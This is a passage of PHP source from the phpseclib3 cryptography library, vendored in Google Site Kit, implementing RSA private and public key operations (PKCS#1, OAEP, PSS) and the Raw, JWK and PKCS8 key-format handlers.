$this->os2ip($em); $s = $this->rsasp1($m); $s = $this->i2osp($s, $this->k); // Output the signature S return $s; } /** * Create a signature * * @see self::verify() * @param string $message * @return string */ public function sign($message) { switch ($this->signaturePadding) { case self::SIGNATURE_PKCS1: case self::SIGNATURE_RELAXED_PKCS1: return $this->rsassa_pkcs1_v1_5_sign($message); //case self::SIGNATURE_PSS: default: return $this->rsassa_pss_sign($message); } } /** * RSAES-PKCS1-V1_5-DECRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.2.2 RFC3447#section-7.2.2}. * * @param string $c * @return bool|string */ private function rsaes_pkcs1_v1_5_decrypt($c) { // Length checking if (\strlen($c) != $this->k) { // or if k < 11 throw new \LengthException('Ciphertext representative too long'); } // RSA decryption $c = $this->os2ip($c); $m = $this->rsadp($c); $em = $this->i2osp($m, $this->k); // EME-PKCS1-v1_5 decoding if (\ord($em[0]) != 0 || \ord($em[1]) > 2) { throw new \RuntimeException('Decryption error'); } $ps = \substr($em, 2, \strpos($em, \chr(0), 2) - 2); $m = \substr($em, \strlen($ps) + 3); if (\strlen($ps) < 8) { throw new \RuntimeException('Decryption error'); } // Output M return $m; } /** * RSAES-OAEP-DECRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.1.2 RFC3447#section-7.1.2}. The fact that the error * messages aren't distinguishable from one another hinders debugging, but, to quote from RFC3447#section-7.1.2: * * Note. Care must be taken to ensure that an opponent cannot * distinguish the different error conditions in Step 3.g, whether by * error message or timing, or, more generally, learn partial * information about the encoded message EM. Otherwise an opponent may * be able to obtain useful information about the decryption of the * ciphertext C, leading to a chosen-ciphertext attack such as the one * observed by Manger [36]. * * @param string $c * @return bool|string */ private function rsaes_oaep_decrypt($c) { // Length checking // if $l is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. if (\strlen($c) != $this->k || $this->k < 2 * $this->hLen + 2) { throw new \LengthException('Ciphertext representative too long'); } // RSA decryption $c = $this->os2ip($c); $m = $this->rsadp($c); $em = $this->i2osp($m, $this->k); // EME-OAEP decoding $lHash = $this->hash->hash($this->label); $y = \ord($em[0]); $maskedSeed = \substr($em, 1, $this->hLen); $maskedDB = \substr($em, $this->hLen + 1); $seedMask = $this->mgf1($maskedDB, $this->hLen); $seed = $maskedSeed ^ $seedMask; $dbMask = $this->mgf1($seed, $this->k - $this->hLen - 1); $db = $maskedDB ^ $dbMask; $lHash2 = \substr($db, 0, $this->hLen); $m = \substr($db, $this->hLen); $hashesMatch = \hash_equals($lHash, $lHash2); $leadingZeros = 1; $patternMatch = 0; $offset = 0; for ($i = 0; $i < \strlen($m); $i++) { $patternMatch |= $leadingZeros & $m[$i] === "\x01"; $leadingZeros &= $m[$i] === "\x00"; $offset += $patternMatch ? 0 : 1; } // we do | instead of || to avoid https://en.wikipedia.org/wiki/Short-circuit_evaluation // to protect against timing attacks if (!$hashesMatch | !$patternMatch) { throw new \RuntimeException('Decryption error'); } // Output the message M return \substr($m, $offset + 1); } /** * Raw Encryption / Decryption * * Doesn't use padding and is not recommended. * * @param string $m * @return bool|string * @throws \LengthException if strlen($m) > $this->k */ private function raw_encrypt($m) { if (\strlen($m) > $this->k) { throw new \LengthException('Ciphertext representative too long'); } $temp = $this->os2ip($m); $temp = $this->rsadp($temp); return $this->i2osp($temp, $this->k); } /** * Decryption * * @see self::encrypt() * @param string $ciphertext * @return bool|string */ public function decrypt($ciphertext) { switch ($this->encryptionPadding) { case self::ENCRYPTION_NONE: return $this->raw_encrypt($ciphertext); case self::ENCRYPTION_PKCS1: return $this->rsaes_pkcs1_v1_5_decrypt($ciphertext); //case self::ENCRYPTION_OAEP: default: return $this->rsaes_oaep_decrypt($ciphertext); } } /** * Returns the public key * * @return mixed */ public function getPublicKey() { $type = self::validatePlugin('Keys', 'PKCS8', 'savePublicKey'); if (empty($this->modulus) || empty($this->publicExponent)) { throw new \RuntimeException('Public key components not found'); } $key = $type::savePublicKey($this->modulus, $this->publicExponent); return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::loadFormat('PKCS8', $key)->withHash($this->hash->getHash())->withMGFHash($this->mgfHash->getHash())->withSaltLength($this->sLen)->withLabel($this->label)->withPadding($this->signaturePadding | $this->encryptionPadding); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, empty($this->primes) ? 'savePublicKey' : 'savePrivateKey'); if ($type == \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS::class) { if ($this->signaturePadding == self::SIGNATURE_PSS) { $options += ['hash' => $this->hash->getHash(), 'MGFHash' => $this->mgfHash->getHash(), 'saltLength' => $this->getSaltLength()]; } else { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException('The PSS format can only be used when the signature method has been explicitly set to PSS'); } } if (empty($this->primes)) { return $type::savePublicKey($this->modulus, $this->exponent, $options); } return $type::savePrivateKey($this->modulus, $this->publicExponent, $this->exponent, $this->primes, $this->exponents, $this->coefficients, $this->password, $options); /* $key = $type::savePrivateKey($this->modulus, $this->publicExponent, $this->exponent, $this->primes, $this->exponents, $this->coefficients, $this->password, $options); if ($key !== false || count($this->primes) == 2) { return $key; } $nSize = $this->getSize() >> 1; $primes = [1 => clone self::$one, clone self::$one]; $i = 1; foreach ($this->primes as $prime) { $primes[$i] = $primes[$i]->multiply($prime); if ($primes[$i]->getLength() >= $nSize) { $i++; } } $exponents = []; $coefficients = [2 => $primes[2]->modInverse($primes[1])]; foreach ($primes as $i => $prime) { $temp = $prime->subtract(self::$one); $exponents[$i] = $this->modulus->modInverse($temp); } return $type::savePrivateKey($this->modulus, $this->publicExponent, $this->exponent, $primes, $exponents, $coefficients, $this->password, $options); */ } } <?php /** * RSA Public Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DigestInfo; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Raw RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ final class PublicKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA implements \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey { use Common\Traits\Fingerprint; /** * Exponentiate * * @param BigInteger $x * @return BigInteger */ private function exponentiate(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { return $x->modPow($this->exponent, $this->modulus); } /** * RSAVP1 * * See {@link http://tools.ietf.org/html/rfc3447#section-5.2.2 RFC3447#section-5.2.2}. * * @param BigInteger $s * @return bool|BigInteger */ private function rsavp1($s) { if ($s->compare(self::$zero) < 0 || $s->compare($this->modulus) > 0) { return \false; } return $this->exponentiate($s); } /** * RSASSA-PKCS1-V1_5-VERIFY * * See {@link http://tools.ietf.org/html/rfc3447#section-8.2.2 RFC3447#section-8.2.2}. * * @param string $m * @param string $s * @throws \LengthException if the RSA modulus is too short * @return bool */ private function rsassa_pkcs1_v1_5_verify($m, $s) { // Length checking if (\strlen($s) != $this->k) { return \false; } // RSA verification $s = $this->os2ip($s); $m2 = $this->rsavp1($s); if ($m2 === \false) { return \false; } $em = $this->i2osp($m2, $this->k); if ($em === \false) { return \false; } // EMSA-PKCS1-v1_5 encoding $exception = \false; // If the encoding operation outputs "intended encoded message length too short," output "RSA modulus // too short" and stop. try { $em2 = $this->emsa_pkcs1_v1_5_encode($m, $this->k); $r1 = \hash_equals($em, $em2); } catch (\LengthException $e) { $exception = \true; } try { $em3 = $this->emsa_pkcs1_v1_5_encode_without_null($m, $this->k); $r2 = \hash_equals($em, $em3); } catch (\LengthException $e) { $exception = \true; } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException $e) { $r2 = \false; } if ($exception) { throw new \LengthException('RSA modulus too short'); } // Compare return $r1 || $r2; } /** * RSASSA-PKCS1-V1_5-VERIFY (relaxed matching) * * Per {@link http://tools.ietf.org/html/rfc3447#page-43 RFC3447#page-43} PKCS1 v1.5 * specified the use BER encoding rather than DER encoding that PKCS1 v2.0 specified. * This means that under rare conditions you can have a perfectly valid v1.5 signature * that fails to validate with _rsassa_pkcs1_v1_5_verify(). PKCS1 v2.1 also recommends * that if you're going to validate these types of signatures you "should indicate * whether the underlying BER encoding is a DER encoding and hence whether the signature * is valid with respect to the specification given in [PKCS1 v2.0+]". so if you do * $rsa->getLastPadding() and get RSA::PADDING_RELAXED_PKCS1 back instead of * RSA::PADDING_PKCS1... that means BER encoding was used. * * @param string $m * @param string $s * @return bool */ private function rsassa_pkcs1_v1_5_relaxed_verify($m, $s) { // Length checking if (\strlen($s) != $this->k) { return \false; } // RSA verification $s = $this->os2ip($s); $m2 = $this->rsavp1($s); if ($m2 === \false) { return \false; } $em = $this->i2osp($m2, $this->k); if ($em === \false) { return \false; } if (\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($em, 2) != "\x00\x01") { return \false; } $em = \ltrim($em, "\xff"); if (\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($em) != "\x00") { return \false; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($em); if (!\is_array($decoded) || empty($decoded[0]) || \strlen($em) > $decoded[0]['length']) { return \false; } static $oids; if (!isset($oids)) { $oids = [ 'md2' => '1.2.840.113549.2.2', 'md4' => '1.2.840.113549.2.4', // from PKCS1 v1.5 'md5' => '1.2.840.113549.2.5', 'id-sha1' => '1.3.14.3.2.26', 'id-sha256' => '2.16.840.1.101.3.4.2.1', 'id-sha384' => '2.16.840.1.101.3.4.2.2', 'id-sha512' => '2.16.840.1.101.3.4.2.3', // from PKCS1 v2.2 'id-sha224' => '2.16.840.1.101.3.4.2.4', 'id-sha512/224' => '2.16.840.1.101.3.4.2.5', 'id-sha512/256' => '2.16.840.1.101.3.4.2.6', ]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::loadOIDs($oids); } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DigestInfo::MAP); if (!isset($decoded) || $decoded === \false) { return \false; } if (!isset($oids[$decoded['digestAlgorithm']['algorithm']])) { return \false; } if (isset($decoded['digestAlgorithm']['parameters']) && $decoded['digestAlgorithm']['parameters'] !== ['null' => '']) { return \false; } $hash = $decoded['digestAlgorithm']['algorithm']; $hash = \substr($hash, 0, 3) == 'id-' ? \substr($hash, 3) : $hash; $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash($hash); $em = $hash->hash($m); $em2 = $decoded['digest']; return \hash_equals($em, $em2); } /** * EMSA-PSS-VERIFY * * See {@link http://tools.ietf.org/html/rfc3447#section-9.1.2 RFC3447#section-9.1.2}. * * @param string $m * @param string $em * @param int $emBits * @return string */ private function emsa_pss_verify($m, $em, $emBits) { // if $m is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. $emLen = $emBits + 7 >> 3; // ie. ceil($emBits / 8); $sLen = $this->sLen !== null ? $this->sLen : $this->hLen; $mHash = $this->hash->hash($m); if ($emLen < $this->hLen + $sLen + 2) { return \false; } if ($em[\strlen($em) - 1] != \chr(0xbc)) { return \false; } $maskedDB = \substr($em, 0, -$this->hLen - 1); $h = \substr($em, -$this->hLen - 1, $this->hLen); $temp = \chr(0xff << ($emBits & 7)); if ((~$maskedDB[0] & $temp) != $temp) { return \false; } $dbMask = $this->mgf1($h, $emLen - $this->hLen - 1); $db = $maskedDB ^ $dbMask; $db[0] = ~\chr(0xff << ($emBits & 7)) & $db[0]; $temp = $emLen - $this->hLen - $sLen - 2; if (\substr($db, 0, $temp) != \str_repeat(\chr(0), $temp) || \ord($db[$temp]) != 1) { return \false; } $salt = \substr($db, $temp + 1); // should be $sLen long $m2 = "\x00\x00\x00\x00\x00\x00\x00\x00" . $mHash . $salt; $h2 = $this->hash->hash($m2); return \hash_equals($h, $h2); } /** * RSASSA-PSS-VERIFY * * See {@link http://tools.ietf.org/html/rfc3447#section-8.1.2 RFC3447#section-8.1.2}. * * @param string $m * @param string $s * @return bool|string */ private function rsassa_pss_verify($m, $s) { // Length checking if (\strlen($s) != $this->k) { return \false; } // RSA verification $modBits = \strlen($this->modulus->toBits()); $s2 = $this->os2ip($s); $m2 = $this->rsavp1($s2); $em = $this->i2osp($m2, $this->k); if ($em === \false) { return \false; } // EMSA-PSS verification return $this->emsa_pss_verify($m, $em, $modBits - 1); } /** * Verifies a signature * * @see self::sign() * @param string $message * @param string $signature * @return bool */ public function verify($message, $signature) { switch ($this->signaturePadding) { case self::SIGNATURE_RELAXED_PKCS1: return $this->rsassa_pkcs1_v1_5_relaxed_verify($message, $signature); case self::SIGNATURE_PKCS1: return $this->rsassa_pkcs1_v1_5_verify($message, $signature); //case self::SIGNATURE_PSS: default: return $this->rsassa_pss_verify($message, $signature); } } /** * RSAES-PKCS1-V1_5-ENCRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.2.1 RFC3447#section-7.2.1}. * * @param string $m * @param bool $pkcs15_compat optional * @throws \LengthException if strlen($m) > $this->k - 11 * @return bool|string */ private function rsaes_pkcs1_v1_5_encrypt($m, $pkcs15_compat = \false) { $mLen = \strlen($m); // Length checking if ($mLen > $this->k - 11) { throw new \LengthException('Message too long'); } // EME-PKCS1-v1_5 encoding $psLen = $this->k - $mLen - 3; $ps = ''; while (\strlen($ps) != $psLen) { $temp = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($psLen - \strlen($ps)); $temp = \str_replace("\x00", '', $temp); $ps .= $temp; } $type = 2; $em = \chr(0) . \chr($type) . $ps . \chr(0) . $m; // RSA encryption $m = $this->os2ip($em); $c = $this->rsaep($m); $c = $this->i2osp($c, $this->k); // Output the ciphertext C return $c; } /** * RSAES-OAEP-ENCRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.1.1 RFC3447#section-7.1.1} and * {http://en.wikipedia.org/wiki/Optimal_Asymmetric_Encryption_Padding OAES}. * * @param string $m * @throws \LengthException if strlen($m) > $this->k - 2 * $this->hLen - 2 * @return string */ private function rsaes_oaep_encrypt($m) { $mLen = \strlen($m); // Length checking // if $l is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. if ($mLen > $this->k - 2 * $this->hLen - 2) { throw new \LengthException('Message too long'); } // EME-OAEP encoding $lHash = $this->hash->hash($this->label); $ps = \str_repeat(\chr(0), $this->k - $mLen - 2 * $this->hLen - 2); $db = $lHash . $ps . \chr(1) . $m; $seed = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($this->hLen); $dbMask = $this->mgf1($seed, $this->k - $this->hLen - 1); $maskedDB = $db ^ $dbMask; $seedMask = $this->mgf1($maskedDB, $this->hLen); $maskedSeed = $seed ^ $seedMask; $em = \chr(0) . $maskedSeed . $maskedDB; // RSA encryption $m = $this->os2ip($em); $c = $this->rsaep($m); $c = $this->i2osp($c, $this->k); // Output the ciphertext C return $c; } /** * RSAEP * * See {@link http://tools.ietf.org/html/rfc3447#section-5.1.1 RFC3447#section-5.1.1}. * * @param BigInteger $m * @return bool|BigInteger */ private function rsaep($m) { if ($m->compare(self::$zero) < 0 || $m->compare($this->modulus) > 0) { throw new \OutOfRangeException('Message representative out of range'); } return $this->exponentiate($m); } /** * Raw Encryption / Decryption * * Doesn't use padding and is not recommended. * * @param string $m * @return bool|string * @throws \LengthException if strlen($m) > $this->k */ private function raw_encrypt($m) { if (\strlen($m) > $this->k) { throw new \LengthException('Message too long'); } $temp = $this->os2ip($m); $temp = $this->rsaep($temp); return $this->i2osp($temp, $this->k); } /** * Encryption * * Both self::PADDING_OAEP and self::PADDING_PKCS1 both place limits on how long $plaintext can be. * If $plaintext exceeds those limits it will be broken up so that it does and the resultant ciphertext's will * be concatenated together. * * @see self::decrypt() * @param string $plaintext * @return bool|string * @throws \LengthException if the RSA modulus is too short */ public function encrypt($plaintext) { switch ($this->encryptionPadding) { case self::ENCRYPTION_NONE: return $this->raw_encrypt($plaintext); case self::ENCRYPTION_PKCS1: return $this->rsaes_pkcs1_v1_5_encrypt($plaintext); //case self::ENCRYPTION_OAEP: default: return $this->rsaes_oaep_encrypt($plaintext); } } /** * Returns the public key * * The public key is only returned under two circumstances - if the private key had the public key embedded within it * or if the public key was set via setPublicKey(). If the currently loaded key is supposed to be the public key this * function won't return it since this library, for the most part, doesn't distinguish between public and private keys. * * @param string $type * @param array $options optional * @return mixed */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); if ($type == \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS::class) { if ($this->signaturePadding == self::SIGNATURE_PSS) { $options += ['hash' => $this->hash->getHash(), 'MGFHash' => $this->mgfHash->getHash(), 'saltLength' => $this->getSaltLength()]; } else { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException('The PSS format can only be used when the signature method has been explicitly set to PSS'); } } return $type::savePublicKey($this->modulus, $this->publicExponent, $options); } /** * Converts a public key to a private key * * @return RSA */ public function asPrivateKey() { $new = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\PrivateKey(); $new->exponent = $this->exponent; $new->modulus = $this->modulus; $new->k = $this->k; $new->format = $this->format; return $new->withHash($this->hash->getHash())->withMGFHash($this->mgfHash->getHash())->withSaltLength($this->sLen)->withLabel($this->label)->withPadding($this->signaturePadding | $this->encryptionPadding); } } <?php /** * Raw RSA Key Handler * * PHP version 5 * * An array containing two \phpseclib3\Math\BigInteger objects. * * The exponent can be indexed with any of the following: * * 0, e, exponent, publicExponent * * The modulus can be indexed with any of the following: * * 1, n, modulo, modulus * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Raw RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Raw { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!\is_array($key)) { throw new \UnexpectedValueException('Key should be a array - not a ' . \gettype($key)); } $key = \array_change_key_case($key, \CASE_LOWER); $components = ['isPublicKey' => \false]; foreach (['e', 'exponent', 'publicexponent', 0, 'privateexponent', 'd'] as $index) { if (isset($key[$index])) { $components['publicExponent'] = $key[$index]; break; } } foreach (['n', 'modulo', 'modulus', 1] as $index) { if (isset($key[$index])) { $components['modulus'] = $key[$index]; break; } } if (!isset($components['publicExponent']) || !isset($components['modulus'])) { throw new \UnexpectedValueException('Modulus / exponent not present'); } if (isset($key['primes'])) { $components['primes'] = $key['primes']; } elseif (isset($key['p']) && isset($key['q'])) { $indices = [['p', 'q'], ['prime1', 'prime2']]; foreach ($indices as $index) { list($i0, $i1) = $index; if (isset($key[$i0]) && isset($key[$i1])) { $components['primes'] = [1 => $key[$i0], $key[$i1]]; } } } if (isset($key['exponents'])) { $components['exponents'] = $key['exponents']; } else { $indices = [['dp', 'dq'], ['exponent1', 'exponent2']]; foreach ($indices as $index) { list($i0, $i1) = $index; if (isset($key[$i0]) && isset($key[$i1])) { $components['exponents'] = [1 => $key[$i0], $key[$i1]]; } } } if (isset($key['coefficients'])) { $components['coefficients'] = $key['coefficients']; } else { foreach (['inverseq', 'q\'', 'coefficient'] as $index) { if (isset($key[$index])) { $components['coefficients'] = [2 => $key[$index]]; } } } if (!isset($components['primes'])) { $components['isPublicKey'] = \true; return $components; } if (!isset($components['exponents'])) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); $temp = $components['primes'][1]->subtract($one); $exponents = [1 => $components['publicExponent']->modInverse($temp)]; $temp = $components['primes'][2]->subtract($one); $exponents[] = $components['publicExponent']->modInverse($temp); $components['exponents'] = $exponents; } if (!isset($components['coefficients'])) { $components['coefficients'] = [2 => $components['primes'][2]->modInverse($components['primes'][1])]; } foreach (['privateexponent', 'd'] as $index) { if (isset($key[$index])) { $components['privateExponent'] = $key[$index]; break; } } return $components; } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return array */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { if (!empty($password) && \is_string($password)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\UnsupportedFormatException('Raw private keys do not support encryption'); } return ['e' => clone $e, 'n' => clone $n, 'd' => clone $d, 'primes' => \array_map(function ($var) { return clone $var; }, $primes), 'exponents' => \array_map(function ($var) { return clone $var; }, $exponents), 'coefficients' => \array_map(function ($var) { return clone $var; }, $coefficients)]; } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @return array */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e) { return ['e' => clone $e, 'n' => clone $n]; } } <?php /** * JSON Web Key (RFC7517) Formatted RSA Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\JWK as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * JWK Formatted RSA Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class JWK extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\JWK { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); if ($key->kty != 'RSA') { throw new \RuntimeException('Only RSA JWK keys are supported'); } $count = $publicCount = 0; $vars = ['n', 'e', 'd', 'p', 'q', 'dp', 'dq', 'qi']; foreach ($vars as $var) { if (!isset($key->{$var}) || !\is_string($key->{$var})) { continue; } $count++; $value = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_decode($key->{$var}), 256); switch ($var) { case 'n': $publicCount++; $components['modulus'] = $value; break; case 'e': $publicCount++; $components['publicExponent'] = $value; break; case 'd': $components['privateExponent'] = $value; break; case 'p': $components['primes'][1] = $value; break; case 'q': $components['primes'][2] = $value; break; case 'dp': $components['exponents'][1] = $value; break; case 'dq': $components['exponents'][2] = $value; break; case 'qi': $components['coefficients'][2] = $value; } } if ($count == \count($vars)) { return $components + ['isPublicKey' => \false]; } if ($count == 2 && $publicCount == 2) { return $components + ['isPublicKey' => \true]; } throw new \UnexpectedValueException('Key does not have an appropriate number of RSA parameters'); } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { if (\count($primes) != 2) { throw new \InvalidArgumentException('JWK does not support multi-prime RSA keys'); } $key = ['kty' => 'RSA', 'n' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($n->toBytes()), 'e' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($e->toBytes()), 'd' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($d->toBytes()), 'p' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($primes[1]->toBytes()), 'q' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($primes[2]->toBytes()), 'dp' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($exponents[1]->toBytes()), 'dq' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($exponents[2]->toBytes()), 'qi' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($coefficients[2]->toBytes())]; return self::wrapKey($key, $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, array $options = []) { $key = ['kty' => 'RSA', 'n' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($n->toBytes()), 'e' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($e->toBytes())]; return self::wrapKey($key, $options); } } <?php /** * PKCS#8 Formatted RSA Key Handler * * PHP version 5 * * Used by PHP's openssl_public_encrypt() and openssl's rsautl (when -pubin is set) * * Processes keys with the following headers: * * -----BEGIN ENCRYPTED PRIVATE KEY----- * -----BEGIN PRIVATE KEY----- * -----BEGIN PUBLIC KEY----- * * Analogous to ssh-keygen's pkcs8 format (as specified by -m). Although PKCS8 * is specific to private keys it's basically creating a DER-encoded wrapper * for keys. This just extends that same concept to public keys (much like ssh-keygen) * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS8 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 { /** * OID Name * * @var string */ const OID_NAME = 'rsaEncryption'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.113549.1.1.1'; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = \false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); if (isset($key['privateKey'])) { $components['isPublicKey'] = \false; $type = 'private'; } else { $components['isPublicKey'] = \true; $type = 'public'; } $result = $components + \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS1::load($key[$type . 'Key']); if (isset($key['meta'])) { $result['meta'] = $key['meta']; } return $result; } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS1::savePrivateKey($n, $e, $d, $primes, $exponents, $coefficients); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); return self::wrapPrivateKey($key, [], null, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, array $options = []) { $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS1::savePublicKey($n, $e); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); return self::wrapPublicKey($key, null, null, $options); } } <?php /** * PKCS#8 Formatted RSA-PSS Key Handler * * PHP version 5 * * Used by PHP's openssl_public_encrypt() and openssl's rsautl (when -pubin is set) * * Processes keys with the following headers: * * -----BEGIN ENCRYPTED PRIVATE 